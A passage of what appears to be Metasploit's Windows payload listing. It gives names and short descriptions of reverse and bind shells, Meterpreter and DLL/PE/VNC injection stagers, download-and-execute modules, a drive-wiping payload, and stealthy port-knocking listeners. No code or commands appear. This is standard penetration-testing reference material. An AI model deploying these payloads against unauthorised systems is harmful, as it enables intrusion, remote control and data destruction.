Listen for a connection\nwindows/dllinject/bind_tcp_uuid Inject a DLL via a reflective loader. Listen for a connection with UUID Support (Windows x86)\nwindows/dllinject/find_tag Inject a DLL via a reflective loader. Use an established connection\nwindows/dllinject/reverse_hop_http Inject a DLL via a reflective loader. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as ahop.\nwindows/dllinject/reverse_http Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows wininet)\nwindows/dllinject/reverse_http_proxy_pstore Inject a DLL via a reflective loader. Tunnel communication over HTTP\nwindows/dllinject/reverse_ipv6_tcp Inject a DLL via a reflective loader. Connect back to the attacker over IPv6\nwindows/dllinject/reverse_nonx_tcp Inject a DLL via a reflective loader. Connect back to the attacker (No NX)\nwindows/dllinject/reverse_ord_tcp Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_allports Inject a DLL via a reflective loader. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/dllinject/reverse_tcp_dns Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_rc4 Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_rc4_dns Inject a DLL via a reflective loader. Connect back to the attacker\nwindows/dllinject/reverse_tcp_uuid Inject a DLL via a reflective loader. Connect back to the attacker with UUID Support\nwindows/dllinject/reverse_winhttp Inject a DLL via a reflective loader. Tunnel communication over HTTP (Windows winhttp)\nwindows/dns_txt_query_exec Performs a TXT query against a series of DNS record(s) and executes the returned payload\nwindows/download_exec Download an EXE from an HTTP(S)/FTP URL and execute it\nwindows/exec Execute an arbitrary command\nwindows/format_all_drives This payload formats all mounted disks in Windows (aka ShellcodeOfDeath). After formatting, this payload sets the volume label to the string specified in the VOLUMELABEL option. If the code is unable to access a drive for any reason, it skips the drive and proceeds to the next volume.\nwindows/loadlibrary Load an arbitrary library path\nwindows/messagebox Spawns a dialog via MessageBox using a customizable title, text & icon\nwindows/meterpreter/bind_hidden_ipknock_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. Thesocket will appear as "closed," thus helping to hide the shellcode\nwindows/meterpreter/bind_hidden_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/meterpreter/bind_ipv6_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x86)\nwindows/meterpreter/bind_ipv6_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/meterpreter/bind_named_pipe Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x86)\nwindows/meterpreter/bind_nonx_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (No NX)\nwindows/meterpreter/bind_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x86)\nwindows/meterpreter/bind_tcp_rc4 Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection\nwindows/meterpreter/bind_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection with UUID Support (Windows x86)\nwindows/meterpreter/find_tag Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Use an established connection\nwindows/meterpreter/reverse_hop_http Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.\nwindows/meterpreter/reverse_http Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows wininet)\nwindows/meterpreter/reverse_http_proxy_pstore Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP\nwindows/meterpreter/reverse_https Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows wininet)\nwindows/meterpreter/reverse_https_proxy Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP using SSL with custom proxy support\nwindows/meterpreter/reverse_ipv6_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker over IPv6\nwindows/meterpreter/reverse_named_pipe Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot\nwindows/meterpreter/reverse_nonx_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker (No NX)\nwindows/meterpreter/reverse_ord_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_allports Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/meterpreter/reverse_tcp_dns Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_rc4 Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_rc4_dns Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/meterpreter/reverse_tcp_uuid Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support\nwindows/meterpreter/reverse_winhttp Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows winhttp)\nwindows/meterpreter/reverse_winhttps Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows winhttp)\nwindows/meterpreter_bind_named_pipe Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_bind_tcp Connect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_http Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_https Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_ipv6_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/meterpreter_reverse_tcp Connect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.\nwindows/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service\nwindows/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service\nwindows/patchupdllinject/bind_hidden_ipknock_tcp Inject a custom DLL into the exploited process. Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/patchupdllinject/bind_hidden_tcp Inject a custom DLL into the exploited process. Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/patchupdllinject/bind_ipv6_tcp Inject a custom DLL into the exploited process. Listen for an IPv6 connection (Windows x86)\nwindows/patchupdllinject/bind_ipv6_tcp_uuid Inject a custom DLL into the exploited process. Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/patchupdllinject/bind_named_pipe Inject a custom DLL into the exploited process. Listen for a pipe connection (Windows x86)\nwindows/patchupdllinject/bind_nonx_tcp Inject a custom DLL into the exploited process. Listen for a connection (No NX)\nwindows/patchupdllinject/bind_tcp Inject a custom DLL into the exploited process. Listen for a connection (Windows x86)\nwindows/patchupdllinject/bind_tcp_rc4 Inject a custom DLL into the exploited process. Listen for a connection\nwindows/patchupdllinject/bind_tcp_uuid Inject a custom DLL into the exploited process. Listen for a connection with UUID Support (Windows x86)\nwindows/patchupdllinject/find_tag Inject a custom DLL into the exploited process. Use an established connection\nwindows/patchupdllinject/reverse_ipv6_tcp Inject a custom DLL into the exploited process. Connect back to the attacker over IPv6\nwindows/patchupdllinject/reverse_nonx_tcp Inject a custom DLL into the exploited process. Connect back to the attacker (No NX)\nwindows/patchupdllinject/reverse_ord_tcp Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_allports Inject a custom DLL into the exploited process. Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/patchupdllinject/reverse_tcp_dns Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_rc4 Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_rc4_dns Inject a custom DLL into the exploited process. Connect back to the attacker\nwindows/patchupdllinject/reverse_tcp_uuid Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support\nwindows/patchupmeterpreter/bind_hidden_ipknock_tcp Inject the meterpreter server DLL (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/patchupmeterpreter/bind_hidden_tcp Inject the meterpreter server DLL (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/patchupmeterpreter/bind_ipv6_tcp Inject the meterpreter server DLL (staged). Listen for an IPv6 connection (Windows x86)\nwindows/patchupmeterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/patchupmeterpreter/bind_named_pipe Inject the meterpreter server DLL (staged). Listen for a pipe connection (Windows x86)\nwindows/patchupmeterpreter/bind_nonx_tcp Inject the meterpreter server DLL (staged). Listen for a connection (No NX)\nwindows/patchupmeterpreter/bind_tcp Inject the meterpreter server DLL (staged). Listen for a connection (Windows x86)\nwindows/patchupmeterpreter/bind_tcp_rc4 Inject the meterpreter server DLL (staged). Listen for a connection\nwindows/patchupmeterpreter/bind_tcp_uuid Inject the meterpreter server DLL (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/patchupmeterpreter/find_tag Inject the meterpreter server DLL (staged). Use an established connection\nwindows/patchupmeterpreter/reverse_ipv6_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker over IPv6\nwindows/patchupmeterpreter/reverse_nonx_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker (No NX)\nwindows/patchupmeterpreter/reverse_ord_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_allports Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/patchupmeterpreter/reverse_tcp_dns Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_rc4 Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_rc4_dns Inject the meterpreter server DLL (staged). Connect back to the attacker\nwindows/patchupmeterpreter/reverse_tcp_uuid Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support\nwindows/peinject/bind_hidden_ipknock_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection.First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you couldget your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/peinject/bind_hidden_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connectionfrom a hidden port and spawn a command shell to the allowed host.\nwindows/peinject/bind_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for an IPv6 connection (Windows x86)\nwindows/peinject/bind_ipv6_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/peinject/bind_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a pipe connection (Windows x86)\nwindows/peinject/bind_nonx_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection(No NX)\nwindows/peinject/bind_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection(Windows x86)\nwindows/peinject/bind_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connection\nwindows/peinject/bind_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Listen for a connectionwith UUID Support (Windows x86)\nwindows/peinject/find_tag Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Use an established connection\nwindows/peinject/reverse_ipv6_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker over IPv6\nwindows/peinject/reverse_named_pipe Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker via a named pipe pivot\nwindows/peinject/reverse_nonx_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker (No NX)\nwindows/peinject/reverse_ord_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_allports Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/peinject/reverse_tcp_dns Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_rc4 Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_rc4_dns Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker\nwindows/peinject/reverse_tcp_uuid Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE loader will execute the pre-mapped PE image starting from the address ofentry after performing image base relocation and API address resolution. This module requires a PE file that contains relocation data and a valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks are not currently supported. Also PE files which use resource loading might crash. . Connect back to the attacker with UUID Support\nwindows/pingback_bind_tcp Open a socket and report UUID when a connection is received (Windows x86)\nwindows/pingback_reverse_tcp Connect back to attacker and report UUID (Windows x86)\nwindows/powershell_bind_tcp Listen for a connection and spawn an interactive powershell session\nwindows/powershell_reverse_tcp Listen for a connection and spawn an interactive powershell session\nwindows/shell/bind_hidden_ipknock_tcp Spawn a piped command shell (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method(you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/shell/bind_hidden_tcp Spawn a piped command shell (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/shell/bind_ipv6_tcp Spawn a piped command shell (staged). Listen for an IPv6 connection (Windows x86)\nwindows/shell/bind_ipv6_tcp_uuid Spawn a piped command shell (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/shell/bind_named_pipe Spawn a piped command shell (staged). Listen for a pipe connection (Windows x86)\nwindows/shell/bind_nonx_tcp Spawn a piped command shell (staged). Listen for a connection (No NX)\nwindows/shell/bind_tcp Spawn a piped command shell (staged). Listen for a connection (Windows x86)\nwindows/shell/bind_tcp_rc4 Spawn a piped command shell (staged). Listen for a connection\nwindows/shell/bind_tcp_uuid Spawn a piped command shell (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/shell/find_tag Spawn a piped command shell (staged). Use an established connection\nwindows/shell/reverse_ipv6_tcp Spawn a piped command shell (staged). Connect back to the attacker over IPv6\nwindows/shell/reverse_nonx_tcp Spawn a piped command shell (staged). Connect back to the attacker (No NX)\nwindows/shell/reverse_ord_tcp Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_allports Spawn a piped command shell (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/shell/reverse_tcp_dns Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_rc4 Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_rc4_dns Spawn a piped command shell (staged). Connect back to the attacker\nwindows/shell/reverse_tcp_uuid Spawn a piped command shell (staged). Connect back to the attacker with UUID Support\nwindows/shell/reverse_udp Spawn a piped command shell (staged). Connect back to the attacker with UUID Support\nwindows/shell_bind_tcp Listen for a connection and spawn a command shell\nwindows/shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command shell\nwindows/shell_hidden_bind_tcp Listen for a connection from certain IP and spawn a command shell. The shellcode will reply with a RST packet if the connections is not coming from the IP defined in AHOST. This way the port will appear as "closed" helping us to hide the shellcode.\nwindows/shell_reverse_tcp Connect back to attacker and spawn a command shell\nwindows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API\nwindows/upexec/bind_hidden_ipknock_tcp Uploads an executable and runs it (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/upexec/bind_hidden_tcp Uploads an executable and runs it (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/upexec/bind_ipv6_tcp Uploads an executable and runs it (staged). Listen for an IPv6 connection (Windows x86)\nwindows/upexec/bind_ipv6_tcp_uuid Uploads an executable and runs it (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/upexec/bind_named_pipe Uploads an executable and runs it (staged). Listen for a pipe connection (Windows x86)\nwindows/upexec/bind_nonx_tcp Uploads an executable and runs it (staged). Listen for a connection (No NX)\nwindows/upexec/bind_tcp Uploads an executable and runs it (staged). Listen for a connection (Windows x86)\nwindows/upexec/bind_tcp_rc4 Uploads an executable and runs it (staged). Listen for a connection\nwindows/upexec/bind_tcp_uuid Uploads an executable and runs it (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/upexec/find_tag Uploads an executable and runs it (staged). Use an established connection\nwindows/upexec/reverse_ipv6_tcp Uploads an executable and runs it (staged). Connect back to the attacker over IPv6\nwindows/upexec/reverse_nonx_tcp Uploads an executable and runs it (staged). Connect back to the attacker (No NX)\nwindows/upexec/reverse_ord_tcp Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_allports Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/upexec/reverse_tcp_dns Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_rc4 Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_rc4_dns Uploads an executable and runs it (staged). Connect back to the attacker\nwindows/upexec/reverse_tcp_uuid Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support\nwindows/upexec/reverse_udp Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support\nwindows/vncinject/bind_hidden_ipknock_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection. First, the port will need to be knocked from the IP defined in KHOST. This IP will work as an authentication method (you can spoof it with tools like hping). After that you could get your shellcode from any IP. The socket will appear as "closed," thus helping to hide the shellcode\nwindows/vncinject/bind_hidden_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.\nwindows/vncinject/bind_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection (Windows x86)\nwindows/vncinject/bind_ipv6_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for an IPv6 connection with UUID Support (Windows x86)\nwindows/vncinject/bind_named_pipe Inject a VNC Dll via a reflective loader (staged). Listen for a pipe connection (Windows x86)\nwindows/vncinject/bind_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (No NX)\nwindows/vncinject/bind_tcp Inject a VNC Dll via a reflective loader (staged). Listen for a connection (Windows x86)\nwindows/vncinject/bind_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Listen for a connection\nwindows/vncinject/bind_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Listen for a connection with UUID Support (Windows x86)\nwindows/vncinject/find_tag Inject a VNC Dll via a reflective loader (staged). Use an established connection\nwindows/vncinject/reverse_hop_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload data/hop/hop.php to the PHP server you wish to use as a hop.\nwindows/vncinject/reverse_http Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows wininet)\nwindows/vncinject/reverse_http_proxy_pstore Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP\nwindows/vncinject/reverse_ipv6_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker over IPv6\nwindows/vncinject/reverse_nonx_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker (No NX)\nwindows/vncinject/reverse_ord_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_allports Inject a VNC Dll via a reflective loader (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)\nwindows/vncinject/reverse_tcp_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_rc4 Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_rc4_dns Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker\nwindows/vncinject/reverse_tcp_uuid Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support\nwindows/vncinject/reverse_winhttp Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows winhttp)\nwindows/x64/exec Execute an arbitrary command (Windows x64)\nwindows/x64/loadlibrary Load an arbitrary x64 library path\nwindows/x64/messagebox Spawn a dialog via MessageBox using a customizable title, text & icon\nwindows/x64/meterpreter/bind_ipv6_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x64)\nwindows/x64/meterpreter/bind_ipv6_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x64)\nwindows/x64/meterpreter/bind_named_pipe Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x64)\nwindows/x64/meterpreter/bind_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x64)\nwindows/x64/meterpreter/bind_tcp_rc4 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker\nwindows/x64/meterpreter/bind_tcp_uuid Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection with UUID Support (Windows x64)\nwindows/x64/meterpreter/reverse_http Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/meterpreter/reverse_https Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)\nwindows/x64/meterpreter/reverse_named_pipe Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot\nwindows/x64/meterpreter/reverse_tcp Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or 